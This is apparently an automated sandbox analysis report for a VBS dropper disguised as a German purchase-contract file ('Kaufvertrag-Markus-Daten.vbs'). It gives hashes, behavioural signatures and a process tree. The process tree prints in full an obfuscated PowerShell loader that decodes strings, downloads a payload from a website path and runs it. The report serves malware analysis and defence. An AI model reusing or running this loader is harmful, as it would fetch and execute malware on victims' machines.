Analysis
-
max time kernel
300s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31/10/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
31102024_0254_Kaufvertrag-Markus-Daten.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
31102024_0254_Kaufvertrag-Markus-Daten.vbs
Resource
win10v2004-20241007-en
General
-
Target
31102024_0254_Kaufvertrag-Markus-Daten.vbs
-
Size
366KB
-
MD5
28489bd43750ec8a5017ec4bb7ca68e2
-
SHA1
90e42439a8179e56d56ffd5a2c97d7ff7f0daaca
-
SHA256
7e6c9757b46fc71815670a8056b6db913409bb571775642ef865ea633fe41cc9
-
SHA512
9470e3c42bf13f73bf43abdaacad0721a213b0e5b9376a2ce813ba39d55f8e154fe959dce2dd0cf6cb56904fbbf0003360e4f38e576cf330447cb8d0b9ff1f1c
-
SSDEEP
6144:QUad3PmM9BogPjFvVHhSZH/7h4hpAQErkpZPU/I7CIkKOmPPMWUwUhkOy96SZGFT:aQL6PErk7gvOZMmanT1A02Oh
Malware Config
Signatures
-
pid Process 2988 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2988 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1716 wrote to memory of 2988 1716 WScript.exe 31 PID 1716 wrote to memory of 2988 1716 WScript.exe 31 PID 1716 wrote to memory of 2988 1716 WScript.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t ') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-